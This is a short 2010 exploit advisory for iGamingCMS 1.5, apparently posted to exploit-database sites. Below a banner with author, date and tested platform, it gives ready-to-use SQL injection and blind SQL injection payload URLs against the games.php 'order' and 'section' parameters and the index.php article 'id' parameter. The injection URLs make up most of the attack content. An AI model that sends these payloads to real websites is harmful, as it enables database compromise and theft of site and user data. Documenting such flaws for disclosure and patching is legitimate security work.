############################################################################ # # # Exploit Title: iGamingCMS1.5 multiple vulnirabilities # # # # Date: 27/08/2010 # # # # Author: Sweet # # # # Contact : charif38@hotmail.fr # # # # Software Link: http://www.igamingcms.com/ # # # # Download: http://forums.igamingcms.com/forumdisplay.php?f=5 # # # # Version:1.5 # # # # Tested on: WinXp sp3 # # # # Risk : hight # # # # # # Description : iGaming CMS is a content management # # system designed for gaming websites. # # # # # # # ############################################################################ 1-SQL injection: http://www.example.com/igamingpath/games.php?order=1[SQLi]§ion=111-222-1933email@address.tst&sort=desc 2-Blind injection: http://www.example.com/igamingpath/games.php?order=title§ion=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0 thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com Saha Ftourkoum et 1,2,3 viva L'Algerie :))